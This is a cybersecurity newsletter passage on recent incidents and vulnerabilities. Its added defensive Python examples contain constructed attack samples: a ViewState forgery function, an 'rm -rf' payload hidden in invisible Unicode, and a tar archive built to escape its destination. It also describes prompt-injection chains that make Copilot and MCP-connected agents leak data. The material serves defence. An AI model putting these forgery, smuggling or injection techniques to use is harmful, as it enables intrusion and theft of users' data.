Welcome to this week’s edition of the Cybersecurity Newsletter, where we dissect the latest threats, vulnerabilities, and disruptions shaping the digital landscape.
As organizations navigate an increasingly complex threat environment, staying ahead of emerging risks has never been more critical.
This week, we’re zeroing in on major incidents that underscore the fragility of cloud infrastructure, legacy update systems, and everyday browsing tools—from widespread service interruptions to sophisticated exploitation chains.
Leading the headlines is the AWS outage that rippled across global services and left businesses scrambling. On October 20, 2025, a DNS resolution failure affecting the DynamoDB endpoint in Amazon Web Services’ US-East-1 region cascaded into everything from e-commerce platforms to streaming services.
Key APIs were degraded or unavailable for much of the day, with knock-on effects on the many consumer and enterprise services that depend on that region. AWS attributed the incident to the DNS failure rather than to an attack, and it again exposed how much of the internet has no tested failover away from a single region.
In our deep dive, we explore the technical fallout, affected sectors, and best practices for building resilient cloud architectures to mitigate similar disruptions.
Shifting to exploitation, attackers are ramping up abuse of Windows Server Update Services (WSUS), Microsoft’s long-standing patch management role. A critical unauthenticated remote code execution flaw, CVE-2025-59287, rooted in unsafe deserialization in WSUS’s AuthorizationCookie handling, went from Patch Tuesday disclosure to public proof-of-concept to exploitation in the wild, prompting an out-of-band Microsoft fix and a CISA KEV listing.
Because WSUS sits upstream of every endpoint it serves, a compromised server is a ready-made internal supply chain for malicious updates. We break down the attack surface, what to look for, and hardening steps: apply the out-of-band update, keep the WSUS ports (8530 and 8531 by default) unreachable from untrusted networks, and segment update servers from the rest of the estate.
Finally, browser and AI security take center stage with a Chrome zero-day and a jailbreak of OpenAI’s new ChatGPT Atlas browser. Google shipped an emergency update for a high-severity type confusion bug in the V8 engine that was being exploited in the wild, and CISA has warned of ongoing attacks.
ChatGPT Atlas, OpenAI’s agentic browser, has meanwhile been jailbroken so that malicious instructions pass as ordinary navigation, opening the door to hidden data exfiltration. These findings are a reminder that even cutting-edge tools are not immune. Our analysis covers patch timelines, zero-day risk, and tips for keeping browser extensions and AI agents on a short leash.
Threats
Malicious WhatsApp Extensions in Chrome Store
Cybersecurity researchers identified 131 fraudulent Chrome extensions posing as WhatsApp Web automation tools, all sharing the same codebase to enable unauthorized bulk messaging and scheduling. These extensions inject scripts into WhatsApp’s interface, bypassing rate limits and anti-spam measures while exploiting Manifest V3 for background operations. Marketed to small businesses in regions like Brazil, they use remote configurations for dynamic updates and employ evasion tactics such as randomized sends and periodic syncs to persist despite policy violations. The campaign operates via a reseller model, with all extensions still active as of mid-October 2025.
Read more: https://cybersecuritynews.com/131-malicious-extensions-targeting-whatsapp/
GlassWorm Malware Targets VS Code Extensions
A new self-propagating malware called GlassWorm has compromised over 35,800 VS Code extension installations on the OpenVSX Marketplace by hiding malicious code with invisible Unicode characters. Initially detected in the “CodeJoy” extension, it steals credentials from platforms like npm, GitHub, and 49 cryptocurrency wallets, then hijacks more extensions to spread. The campaign uses Solana blockchain for resilient C2 infrastructure, with fallbacks like Google Calendar, allowing real-time adaptations. This technique evades visual reviews and static analysis, turning infected devices into proxy nodes for further attacks.
Read more: https://cybersecuritynews.com/new-glassworm-using-invisible-code/
Salt Typhoon Exploits Zero-Day Vulnerabilities
China-linked APT group Salt Typhoon has conducted intrusions leveraging zero-day flaws, including a Citrix vulnerability, targeting telecommunications providers in Europe and the US. The group, attributed to China’s Ministry of State Security, uses supply chain compromises and unpatched weaknesses like ProxyLogon to infiltrate networks, enabling lateral movement and data exfiltration from critical infrastructure. Attacks involve custom tools for privilege escalation and stealth persistence, compromising entities across 12 sectors with stolen configuration files and credentials. Many exploited CVEs, such as those in Ivanti and Fortinet, remain unpatched in high percentages of environments.
Read more: https://cybersecuritynews.com/salt-typhoon-using-zero-day/
Rust-Based ChaosBot Malware Emerges
A new Rust-written backdoor named ChaosBot is targeting corporate networks via phishing with malicious LNK files, using Discord for covert C2 communications. It masquerades as Microsoft Edge processes, abuses service accounts for persistence, and includes anti-VM checks like VMware detection to evade analysis. Deployed through compromised credentials and WMI execution, ChaosBot enables reconnaissance, command execution, and data exfiltration while blending traffic with legitimate Discord activity. Its lightweight design and ETW patching make it resilient against endpoint protections.
Read more: https://cybersecuritynews.com/new-rust-based-chaosbot-malware/
Rise of Stealer Malware Campaigns
Threat actors are increasingly deploying info-stealers such as Stealerium, Lumma, and Atomic to harvest credentials from browsers, wallets, and apps at scale. Open-source variants such as Stealerium and Phantom let opportunistic criminals modify and redistribute payloads, targeting both Windows and macOS, where AppleScript prompts are used to extract data. The stolen identities feed ransomware and follow-on intrusions, with campaigns surging in 2025 through GitHub-hosted downloads and malware-as-a-service offerings. Adversaries sell captured data on underground markets, which makes robust endpoint monitoring essential.
Read more: https://cybersecuritynews.com/threat-actors-with-stealer-malwares/
Advanced Email Phishing Techniques Proliferate
Cybercriminals are enhancing email phishing with QR codes in PDFs, password-protected attachments, and revived calendar invites to bypass filters and mobile security gaps. These multi-stage attacks use trusted file-sharing services and live API calls to harvest credentials, often mimicking secure communications from brands. In 2025, tactics like Axios abuse for session hijacking and deepfakes have boosted success rates by 241%, targeting remote workers and executives. AI-driven personalization scales these threats, combining email with voice and video for convincing social engineering.
Read more: https://cybersecuritynews.com/threat-actors-advancing-email-phishing-attacks/
SideWinder APT Deploys ClickOnce Malware
India-linked SideWinder APT group has launched a phishing campaign using malicious PDFs and ClickOnce apps to deploy StealerBot espionage malware against South Asian diplomatic targets. The infection chain abuses signed MagTek applications for DLL sideloading, leading to fileless payloads via process injection and geofenced delivery. Evolving from Word docs to this PDF/ClickOnce method, it includes dynamic URLs and brief payload windows to hinder analysis. The malware focuses on credential theft and intelligence gathering in sectors like government and maritime.
Read more: https://cybersecuritynews.com/sidewinder-hacking-group-uses-clickonce-based-infection-chain/
Cyber Attacks
RDP Services Targeted by Massive Botnet
A coordinated botnet campaign has been exploiting Microsoft Remote Desktop Protocol services using over 30,000 new IP addresses daily to probe for timing-based vulnerabilities in RD Web Access and RDP web client authentication. Since September 2025, unique IPs have exceeded 500,000, with a focus on U.S. systems and origins primarily from Brazil, Argentina, and Mexico. Traditional IP blocking proves ineffective against this rapidly rotating infrastructure, emphasizing the need for advanced detection of anomalous RDP probes.
Read more: https://cybersecuritynews.com/rdp-services-under-attack/
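The campaign above defeats per-IP blocking because each source sends only a request or two before rotating. The detection that still works aggregates by target endpoint and time window rather than by source. The following is an added example, not code from the article or from any vendor: the log lines are constructed in a simplified W3C-style format (date, time, method, URI, client IP, status), the RD Web login path and thresholds are assumptions, and the rule flags a window in which many never-seen sources each send only a few POSTs to the login page.

```python
"""Added example: distributed RD Web login probing, detected per window rather
than per source IP. Not the article's or any vendor's code; log lines are
constructed in a simplified W3C-style format."""
from collections import defaultdict
from datetime import datetime, timezone

RDWEB_LOGIN = "/RDWeb/Pages/en-US/login.aspx"   # assumed target path


def _constructed_log() -> list:
    lines = []
    # Normal traffic: two users retrying a few times across ten minutes.
    for minute in range(10):
        lines.append(f"2025-10-20 09:0{minute}:15 POST {RDWEB_LOGIN} 192.0.2.10 200")
        lines.append(f"2025-10-20 09:0{minute}:40 POST {RDWEB_LOGIN} 192.0.2.11 401")
    # Botnet burst: 40 distinct sources, one request each, inside one minute.
    for i in range(40):
        lines.append(f"2025-10-20 10:00:{i:02d} POST {RDWEB_LOGIN} 198.51.100.{i + 1} 401")
    return lines


def parse(line: str):
    date, time, method, uri, ip, status = line.split()
    ts = datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
    return ts, method, uri, ip, int(status)


def detect_distributed_probing(lines, window_s=60, min_sources=25, max_per_source=3) -> list:
    """Alert on any window where at least min_sources distinct IPs each sent
    no more than max_per_source POSTs to the login page. A single noisy IP
    never trips this; a rotating botnet does, even though every individual
    address stays under any per-IP lockout threshold."""
    windows = defaultdict(lambda: defaultdict(int))   # bucket -> ip -> count
    for line in lines:
        ts, method, uri, ip, _status = parse(line)
        if method != "POST" or uri != RDWEB_LOGIN:
            continue
        bucket = int(ts.timestamp()) // window_s * window_s
        windows[bucket][ip] += 1

    alerts = []
    for bucket in sorted(windows):
        per_ip = windows[bucket]
        quiet_sources = [ip for ip, n in per_ip.items() if n <= max_per_source]
        if len(quiet_sources) >= min_sources:
            alerts.append({
                "window_start": datetime.fromtimestamp(bucket, timezone.utc).isoformat(),
                "distinct_sources": len(per_ip),
                "requests": sum(per_ip.values()),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_distributed_probing(_constructed_log()):
        print(alert)
```

The thresholds belong in a config, not in code; the useful knobs are the window length and the minimum number of distinct sources, and the response should be a rate limit or step-up on the endpoint rather than another block list.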
ASP.NET Machine Keys Abused in IIS Attacks
Threat actors tracked as REF3927 are taking ASP.NET machine keys that were published in Microsoft documentation and forum posts and reusing them to forge ViewState payloads that pass MAC validation, which yields remote code execution on any Windows IIS server whose web.config carries one of those keys. Once inside, they deploy the Z-Godzilla webshell for command execution and credential theft, then the TOLLBOOTH module, which serves keyword-stuffed pages to search engine crawlers for SEO fraud. Reinfection is common because operators remove the webshell but leave the machine key unchanged, so the same forged ViewState works again; victims span the globe, with China notably excluded.
Read more: https://cybersecuritynews.com/hackers-abuse-asp-machine-keys-iis/
ToolShell Vulnerability Exploits SharePoint Servers
China-based threat actors are actively exploiting the ToolShell vulnerability chain in Microsoft SharePoint, combining CVE-2025-53770 (RCE, CVSS 9.8) and CVE-2025-53771 (spoofing) to plant stealthy webshells without authentication. Attacks target on-premises SharePoint 2016, 2019, and Subscription Edition, sidestep MFA, and extend into integrated services such as Teams and OneDrive; victims include U.S. agencies and energy firms. Applying the patch is not enough on its own: the attackers steal the server’s ASP.NET machine keys, so remediation also requires rotating those keys and restarting IIS. Over 400 systems have been compromised since July 2025.
Read more: https://cybersecuritynews.com/toolshell-vulnerability-compromise-networks/
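The REF3927 campaign and the ToolShell remediation advice above turn on the same point: a machineKey known to the attacker lets them mint ViewState that passes MAC validation, so patching or cleaning without rotating the key leaves the door open. The block below is an added example, not code from the article, Elastic or Microsoft. It mimics the HMAC check in spirit only (ASP.NET’s real ViewState MAC also covers page-specific data), uses a constructed placeholder in place of a real leaked key, and shows three things a practitioner needs: why forgery is trivial once the key is known, how to audit a web.config for a static or known key, and how to generate a replacement.

```python
"""Added example: leaked-key ViewState forgery, web.config audit, key rotation.
Not the article's or Microsoft's code. The MAC below is a simplified stand-in
for ASP.NET's HMACSHA256 ViewState validation and is illustrative only."""
import base64
import hashlib
import hmac
import os
from xml.etree import ElementTree as ET

# Constructed placeholder standing in for a key copied from a public tutorial
# or forum post. Any key that a web search can find belongs in a list like this.
LEAKED_VALIDATION_KEYS = {
    "0123456789ABCDEF" * 8,   # 128 hex chars = 64-byte HMACSHA256 key
}
MAC_LEN = hashlib.sha256().digest_size


def viewstate_mac(validation_key_hex: str, payload: bytes) -> bytes:
    """HMAC-SHA256 over the serialised ViewState with the validationKey."""
    return hmac.new(bytes.fromhex(validation_key_hex), payload, hashlib.sha256).digest()


def forge_viewstate(validation_key_hex: str, payload: bytes) -> str:
    """What an attacker does with a leaked key: append a valid MAC to any payload
    (in a real attack, a deserialisation gadget chain)."""
    return base64.b64encode(payload + viewstate_mac(validation_key_hex, payload)).decode()


def verify_viewstate(validation_key_hex: str, blob: str) -> bool:
    """Server-side check. It cannot distinguish a forged blob from a genuine one
    when the attacker holds the same key, which is the whole problem."""
    raw = base64.b64decode(blob)
    body, mac = raw[:-MAC_LEN], raw[-MAC_LEN:]
    return hmac.compare_digest(mac, viewstate_mac(validation_key_hex, body))


def audit_machine_key(web_config_xml: str) -> dict:
    """Flag a static validationKey, a key on the leaked list, and disabled MAC checks."""
    root = ET.fromstring(web_config_xml)
    findings = {"static_key": False, "leaked_key": False, "mac_disabled": False}
    mk = next(root.iter("machineKey"), None)
    if mk is not None:
        vk = mk.get("validationKey", "AutoGenerate,IsolateApps")
        if "AutoGenerate" not in vk:
            findings["static_key"] = True
            findings["leaked_key"] = vk.upper() in LEAKED_VALIDATION_KEYS
    pages = next(root.iter("pages"), None)
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings["mac_disabled"] = True   # worse than a leaked key: no MAC at all
    return findings


def new_machine_key_element() -> str:
    """Replacement element with fresh random keys: 64 bytes for HMACSHA256
    validation, 32 bytes for AES decryption. Deploy to every node of a web farm,
    then recycle the application pools so old ViewState stops validating."""
    return (
        '<machineKey validationKey="{}" decryptionKey="{}" '
        'validation="HMACSHA256" decryption="AES" />'
    ).format(os.urandom(64).hex().upper(), os.urandom(32).hex().upper())


# Constructed web.config fragment carrying the placeholder "leaked" key.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="{}" decryptionKey="{}" validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>""".format("0123456789ABCDEF" * 8, "0123456789ABCDEF" * 4)

if __name__ == "__main__":
    key = "0123456789ABCDEF" * 8
    blob = forge_viewstate(key, b"<attacker-chosen serialized object>")
    print("forged blob accepted:", verify_viewstate(key, blob))
    print("audit:", audit_machine_key(SAMPLE_WEB_CONFIG))
    print(new_machine_key_element())
```

Run the audit across every web.config on an IIS host (and, for SharePoint, follow Microsoft’s post-ToolShell key rotation guidance); any static key that was ever pasted into a ticket, a wiki, or a repository should be treated exactly like the published ones.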
Adobe Magento RCE Flaw Under Active Exploitation
Hackers are exploiting a critical vulnerability in Adobe Commerce and Magento (CVSS 9.8) to read server files and inject JavaScript that steals customer data and payment details. The CosmicSting flaw (CVE-2024-34102) is an XML external entity issue in the REST API affecting versions up to 2.4.7; attackers use it to read app/etc/env.php, take the encryption key, mint valid JWTs for the admin API, and are compromising an estimated three to five stores per hour. Chained with CVE-2024-2961, it yields server-side code execution, so e-commerce operators should update immediately and rotate the encryption key, since a patched store with a stolen key is still open.
Read more: https://cybersecuritynews.com/adobe-magento-rce-vulnerability-exploited/
Microsoft 365 Exchange Direct Send Abused for Phishing
Attackers are abusing Exchange Online’s Direct Send feature, intended for multifunction devices and legacy applications, to deliver spoofed messages that appear to come from internal users without compromising any account. Because Direct Send accepts mail at the tenant’s MX endpoint from any source, the messages skip the authentication that a connector or SMTP AUTH submission would require and often slip past anti-spam filtering as apparent internal traffic. Organizations should monitor for it, restrict or reject Direct Send where it is not needed, and move genuine devices to authenticated submission.
Read more: https://cybersecuritynews.com/hackers-abuse-microsoft-365-exchange-direct-send/
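A message that arrived through Direct Send leaves a recognisable footprint in the headers that Exchange Online Protection stamps on it. The block below is an added example, not the article’s or Microsoft’s code: both messages are constructed, the tenant domain is a placeholder, and the rule is a heuristic rather than a Microsoft-documented signal. The idea is that mail submitted straight to the tenant’s MX endpoint from an outside host with an internal From address is unauthenticated (AuthAs: Anonymous) and normally fails SPF, DKIM and DMARC for the organisation’s own domain, while genuine internal mail passes all three.

```python
"""Added example: header-based triage for Direct Send abuse. Not the article's
or Microsoft's code; messages are constructed and the rule is a heuristic."""
import email
import email.utils
import re

ORG_DOMAINS = {"contoso.com"}   # hypothetical tenant domains
AUTH_RE = re.compile(r"\b(spf|dkim|dmarc|compauth)=(\w+)", re.IGNORECASE)

# Constructed: external IP, internal sender, no account involved.
DIRECT_SEND_MSG = """\
Received: from mail.example.invalid (203.0.113.10) by
 CO1PEPF000044F2.mail.protection.outlook.com with Microsoft SMTP Server
Authentication-Results: spf=fail (sender IP is 203.0.113.10) smtp.mailfrom=contoso.com;
 dkim=none (message not signed) header.d=none; dmarc=fail action=none
 header.from=contoso.com; compauth=fail reason=001
X-MS-Exchange-Organization-AuthAs: Anonymous
From: "IT Helpdesk" <helpdesk@contoso.com>
To: alice@contoso.com
Subject: Your password expires today

Open the attached scan to keep your account active.
"""

# Constructed: a genuine internal message for comparison.
INTERNAL_MSG = """\
Authentication-Results: spf=pass (sender IP is 192.0.2.25) smtp.mailfrom=contoso.com;
 dkim=pass header.d=contoso.com; dmarc=pass action=none header.from=contoso.com;
 compauth=pass reason=100
X-MS-Exchange-Organization-AuthAs: Internal
From: bob@contoso.com
To: alice@contoso.com
Subject: Lunch?

Noon works for me.
"""


def parse_auth_results(value: str) -> dict:
    """Pull method=result pairs out of an Authentication-Results header."""
    return {method.lower(): result.lower() for method, result in AUTH_RE.findall(value)}


def triage(raw_message: str) -> dict:
    msg = email.message_from_string(raw_message)
    sender = email.utils.parseaddr(msg.get("From", ""))[1]
    sender_domain = sender.rsplit("@", 1)[-1].lower() if "@" in sender else ""
    auth = parse_auth_results(" ".join(msg.get_all("Authentication-Results", [])))
    auth_as = (msg.get("X-MS-Exchange-Organization-AuthAs") or "").strip().lower()

    internal_sender = sender_domain in ORG_DOMAINS
    anonymous = auth_as == "anonymous"
    domain_auth_failed = auth.get("spf") != "pass" and auth.get("dkim") != "pass"
    return {
        "sender": sender,
        "auth": auth,
        "auth_as": auth_as,
        # Internal From + anonymous submission + no SPF/DKIM pass: Direct Send abuse pattern.
        "suspect_direct_send": internal_sender and anonymous and domain_auth_failed,
    }


if __name__ == "__main__":
    for name, raw in (("direct-send", DIRECT_SEND_MSG), ("internal", INTERNAL_MSG)):
        print(name, triage(raw))
```

The heuristic is only a triage aid; a tenant that has deliberately allow-listed a scanner’s IP will see SPF pass for it. At the tenant level, Exchange Online’s RejectDirectSend setting on Set-OrganizationConfig refuses such messages outright, after which devices that genuinely need to send must use SMTP AUTH client submission or an inbound connector.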
Azure Blob Storage Under Threat Actor Siege
Threat actors are using compromised credentials to infiltrate misconfigured Azure Blob Storage accounts, establishing persistence for data exfiltration targeting intellectual property across organizational repositories. This campaign exploits weak access controls to host phishing sites mimicking Office 365 logins and aid forensic evasion in broader attacks. Immediate reviews of storage permissions and logging enablement are critical to counter this growing cloud misconfiguration risk.
Read more: https://cybersecuritynews.com/threat-actors-attacking-azure-blob-storage/
RedTiger Tool Repurposed for Gaming Attacks
The open-source red teaming tool RedTiger is being weaponized against gamers and Discord users, spreading via malicious links in gaming communities to steal accounts and deploy info-stealers. Originally designed for penetration testing, its evasion capabilities make it ideal for targeting high-value social engineering vectors in entertainment sectors. Detection focuses on anomalous tool deployments outside authorized red team exercises.
Read more: https://cybersecuritynews.com/red-teaming-tool-redtiger/
WSUS RCE Vulnerability Faces Active Exploits
CISA warns of ongoing exploitation of a critical remote code execution flaw in Windows Server Update Services (WSUS) that lets unauthenticated attackers run arbitrary code as SYSTEM on WSUS servers via crafted requests. Proof-of-concept exploits are public, raising the stakes for unpatched environments, and Microsoft has issued an out-of-band update. With the flaw now in the KEV catalog, federal agencies must apply it immediately, and everyone else should treat a WSUS server reachable from untrusted networks as an emergency.
Read more: https://cybersecuritynews.com/wsus-rce-vulnerability-exploited/
YouTube Ghost Network Spreads Malware
The “YouTube Ghost” malware network has hijacked over 3,000 channels to distribute info-stealers through videos promoting pirated software and game cheats, luring downloads of malicious payloads. This operation exploits YouTube’s vast reach for mass distribution, evading moderation by rotating compromised accounts. Users should verify download sources and enable two-factor authentication on linked services.
Read more: https://cybersecuritynews.com/youtube-ghost-malware-network/
LockBit 5.0 Ransomware Resurges Aggressively
LockBit 5.0 is actively targeting Windows, Linux, and ESXi environments with enhanced evasion tactics post-Operation Cronos, focusing on critical infrastructure for double-extortion via data leaks. The variant incorporates AI-driven encryption and multi-platform support, challenging previous dominance by groups like ShinySp1d3r in Q3 2025. Backup isolation and endpoint segmentation are essential defenses against this evolving threat.
Vulnerabilities
WSUS RCE Vulnerability PoC Released
A proof-of-concept exploit has emerged for CVE-2025-59287, a critical flaw in Microsoft’s Windows Server Update Services enabling unauthenticated remote code execution with SYSTEM privileges. The vulnerability arises from unsafe deserialization in the AuthorizationCookie handling, affects all supported Windows Server versions from 2012 through 2025, and carries a CVSS v3.1 score of 9.8. Microsoft disclosed it in the October 2025 Patch Tuesday release and flagged its wormable potential across networked WSUS servers; no in-the-wild exploitation had been reported at that point, but the prospect of malicious updates pushed to every managed endpoint makes it urgent. Organizations should apply the security updates immediately and firewall WSUS servers so that only clients and administrators can reach them; the underlying problem is legacy BinaryFormatter deserialization, which Microsoft has deprecated. Read more
LANSCOPE Endpoint Manager RCE Flaw
Motex disclosed CVE-2025-61932, a remote code execution vulnerability in LANSCOPE Endpoint Manager On-Premise Edition versions up to 9.4.7.1, rated CVSS v3.0 9.8, which lets attackers compromise endpoints without privileges or user interaction. Active exploitation has been confirmed through malicious packets sent to the client programs and detection agents; the cloud edition is unaffected. The flaw highlights the risk of on-premises management agents running with elevated privileges, where a single network-reachable bug becomes malware deployment or a pivot point in hybrid environments. Motex urges immediate client-side patching via its portal; no update to the central manager is needed. Read more
Copilot Prompt Injection Vulnerability
Microsoft 365 Copilot faces a prompt injection flaw that enables attackers to steal sensitive tenant data, including recent documents and emails, through malicious content in shared files or emails. The exploit combines prompt injection with automatic tool invocation and ASCII smuggling to hide exfiltrated information in invisible Unicode characters within hyperlinks, bypassing user awareness. Patched following January 2024 disclosure, the vulnerability affected data retrieval like Slack MFA codes or sales figures, underscoring risks in AI assistants processing untrusted inputs. Organizations should enforce strict content validation and monitor for anomalous AI interactions to prevent similar chains. Read more
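The GlassWorm campaign above hides code behind invisible Unicode (variation selectors that render as nothing) and the Copilot chain hides exfiltrated data in Unicode tag characters inside a link; the review control for both is the same scan. The block below is an added example, not code from the article, Koi Security, Microsoft or any project. Its inputs are constructed, and the variation-selector scheme used to build the fake payload is an illustrative encoding, not GlassWorm’s real one; the tag-character round trip is the actual ASCII smuggling technique.

```python
"""Added example: locate invisible Unicode in source or text and decode ASCII
smuggled in Unicode tag characters. Not the article's or any vendor's code;
samples are constructed."""
import unicodedata

ZERO_WIDTH = {0x200B, 0x200C, 0x200D, 0x2060, 0xFEFF}
TAG_LO, TAG_HI = 0xE0000, 0xE007F                       # Unicode tag block (Cf)
VS_RANGES = ((0xFE00, 0xFE0F), (0xE0100, 0xE01EF))      # variation selectors (Mn)


def is_suspicious(ch: str) -> bool:
    """True for characters that render as nothing yet can carry data."""
    cp = ord(ch)
    if cp in ZERO_WIDTH or TAG_LO <= cp <= TAG_HI:
        return True
    if any(lo <= cp <= hi for lo, hi in VS_RANGES):
        return True
    # Remaining format controls (bidi overrides, soft hyphen, ...) are rare in
    # source; flag them and let a reviewer triage legitimate uses such as ZWJ
    # inside emoji sequences in user-facing strings.
    return unicodedata.category(ch) == "Cf"


def find_invisible(text: str) -> list:
    """(line, column, 'U+XXXX', name) for every suspicious character."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if is_suspicious(ch):
                hits.append((line_no, col, f"U+{ord(ch):04X}",
                             unicodedata.name(ch, "<unnamed>")))
    return hits


def encode_tags(ascii_text: str) -> str:
    """Hide printable ASCII as tag characters, as the Copilot chain did."""
    return "".join(chr(TAG_LO + ord(c)) for c in ascii_text if 0x20 <= ord(c) <= 0x7E)


def decode_tags(text: str) -> str:
    """Recover ASCII hidden as tag characters, ignoring everything else."""
    return "".join(chr(ord(c) - TAG_LO) for c in text
                   if TAG_LO + 0x20 <= ord(c) <= TAG_LO + 0x7E)


def strip_invisible(text: str) -> str:
    return "".join(ch for ch in text if not is_suspicious(ch))


# Constructed samples. The payload below looks like an empty string in an editor.
FAKE_PAYLOAD = "".join(chr(0xE0100 + b) for b in b"rm -rf")
JS_SAMPLE = 'const config = "prod";' + FAKE_PAYLOAD + '\nrun(decode(config));\n'
LINK_SAMPLE = "https://example.invalid/report?id=42" + encode_tags("MFA code 123456")

if __name__ == "__main__":
    for hit in find_invisible(JS_SAMPLE):
        print(hit)
    print("hidden in link:", decode_tags(LINK_SAMPLE))
```

Wire find_invisible into the pre-merge checks for extension and dependency code, and run decode_tags over any URL an AI assistant proposes to render or follow; a link whose visible text decodes to something that reads like a secret is the exfiltration, not a rendering glitch.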
Chrome V8 Engine Vulnerability
Google addressed a high-severity flaw in Chrome’s V8 JavaScript engine with an emergency update; type confusion bugs of this kind corrupt memory and, in the worst case, give code execution inside the renderer. Tracked under recent CVEs such as CVE-2025-5419, the issue stems from improper handling in the engine’s optimization pipeline and has been exploited in the wild, with CISA warning of ongoing attacks. The fix ships in the stable channel update for billions of users. Users must update their browsers immediately and leave auto-updates enabled to counter these engine-level threats. Read more
Multiple GitLab Security Vulnerabilities
GitLab patched several high-severity flaws, including denial-of-service vectors and authorization bypasses, that let attackers crash instances, inject CI/CD jobs, or take over accounts via XSS in the search and snippet features. Vulnerabilities such as CVE-2025-4278 (CVSS 8.7) and CVE-2025-5121 (CVSS 8.5) affect versions before 18.0.2, putting source repositories and pipelines on self-managed instances at risk. Emergency releases 18.0.2, 17.11.4, and 17.10.8 address HTML injection, infinite redirects, and unbounded token issues; no widespread breaches have been reported. Administrators should upgrade promptly and review SAML configurations. Read more
MCP Server Platform Vulnerability
A critical issue in the MCP Server Platform from Smithery.ai exposes AI model registries to unauthorized access and potential data leaks, with attackers able to manipulate context protocols in deployed models. The flaw, affecting integrations in coding agents and IDEs, enables prompt injections via malicious issues in public repos, coercing AI to leak private data without direct compromises. Over 14,000 GitHub stars highlight its adoption, amplifying risks for development workflows. Developers should scan for toxic agent flows, restrict external data sources, and apply updates to mitigate these supply-chain vectors. Read more
BIND 9 Vulnerabilities Enabling DoS
Multiple flaws in BIND 9 resolvers allow remote denial of service or cache poisoning. CVE-2025-40775 (CVSS 7.5) crashes a server with a single packet through invalid TSIG handling, affects 9.20.0 through 9.20.8 and 9.21.0 through 9.21.7, and is fixed in 9.18.37, 9.20.9, and 9.21.8; the cache-poisoning issue, tracked as CVE-2025-40778, lets an attacker get forged records accepted into a resolver’s cache and is fixed in the October 2025 releases 9.18.41, 9.20.15, and 9.21.14. More than 706,000 exposed instances are reported vulnerable, and there is no workaround for the assertion failures and memory exhaustion beyond upgrading. Network admins must move to the current release on their branch and monitor for anomalous DNS traffic. Read more
TARmageddon Vulnerability in Rust Library
The TARmageddon flaw (CVE undisclosed) in async-tar and tokio-tar Rust crates enables attackers to replace config files or execute remote code by exploiting path traversal during archive extraction. Affecting millions of downloads in async applications, the issue allows symlink following without checks, leading to arbitrary writes in supply-chain scenarios. No active exploits reported, but its presence in popular forks urges immediate upgrades to patched versions. Rust developers should validate paths strictly and audit dependencies for similar extraction risks. Read more
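The failure mode described above, an extractor that honours `../` components or follows a symlink planted by an earlier archive member, is the same in every language. The block below is an added example of the hardened form, not code from the article or from the async-tar or tokio-tar projects; it uses Python’s tarfile rather than the Rust crates, builds a hostile archive in memory (one benign file plus three escape attempts), and assumes a POSIX filesystem. Each member is resolved with realpath against the destination before anything is written, which also catches a symlink already on disk from an earlier member.

```python
"""Added example: tar extraction that refuses path traversal, absolute names,
hard links and symlinks resolving outside the destination. Not the code of
the article or of any Rust crate; archive is constructed. POSIX assumed."""
import io
import os
import tarfile
import tempfile


def _member(name, data=b"", ttype=tarfile.REGTYPE, linkname=""):
    ti = tarfile.TarInfo(name)
    ti.type = ttype
    ti.linkname = linkname
    ti.size = len(data)
    return ti


def build_hostile_archive() -> bytes:
    """Constructed archive: one benign file plus three escape attempts."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        body = b"data\n"
        tar.addfile(_member("app/config.toml", body), io.BytesIO(body))
        tar.addfile(_member("../../etc/evil.conf", body), io.BytesIO(body))      # traversal
        tar.addfile(_member("/tmp/evil", body), io.BytesIO(body))                # absolute
        tar.addfile(_member("escape", ttype=tarfile.SYMTYPE, linkname="/etc"))  # link out
    return buf.getvalue()


def _inside(base: str, path: str) -> bool:
    return os.path.commonpath([base, path]) == base


def safe_extract(archive: bytes, dest: str):
    """Extract only members whose resolved path stays under dest."""
    base = os.path.realpath(dest)
    extracted, rejected = [], []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        for m in tar:
            # realpath normalises '..' and follows symlinks already on disk, so a
            # link planted by an earlier member cannot redirect a later write.
            target = os.path.realpath(os.path.join(base, m.name))
            if not _inside(base, target):
                rejected.append((m.name, "escapes destination"))
                continue
            if m.islnk():
                rejected.append((m.name, "hard link"))
                continue
            if m.issym():
                link_target = os.path.realpath(os.path.join(os.path.dirname(target), m.linkname))
                if not _inside(base, link_target):
                    rejected.append((m.name, "symlink points outside destination"))
                    continue
                os.makedirs(os.path.dirname(target), exist_ok=True)
                os.symlink(m.linkname, target)
            elif m.isdir():
                os.makedirs(target, exist_ok=True)
            elif m.isfile():
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with tar.extractfile(m) as src, open(target, "wb") as dst:
                    dst.write(src.read())
            else:
                rejected.append((m.name, "special file"))
                continue
            extracted.append(m.name)
    return extracted, rejected


def demo() -> dict:
    dest = tempfile.mkdtemp(prefix="safe-extract-")
    extracted, rejected = safe_extract(build_hostile_archive(), dest)
    return {
        "extracted": extracted,
        "rejected": sorted(name for name, _ in rejected),
        "benign_present": os.path.isfile(os.path.join(dest, "app", "config.toml")),
    }


if __name__ == "__main__":
    print(demo())
```

Whatever library does the extraction, the audit question is the same one this code answers member by member: where does this name resolve, and is that under the directory I asked for.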
Decoding PIN-Protected BitLocker
Researchers demonstrated recovering the keys of PIN-protected BitLocker volumes by intercepting the SPI bus between a laptop’s discrete TPM and its CPU. Once the PIN is entered, the TPM releases the volume master key over that bus in the clear, so a logic analyzer on the SPI lines captures it and the volume can be mounted elsewhere without the PIN. The technique applies to Windows devices with a discrete TPM 2.0 chip and shows that full-disk encryption is only as strong as the hardware path that carries its key. Mitigations are limiting physical access, preferring firmware TPMs that keep the key off an external bus, and keeping recovery keys escrowed so a suspect device can be rebuilt rather than trusted. Read more
ChatGPT Atlas Browser Jailbroken
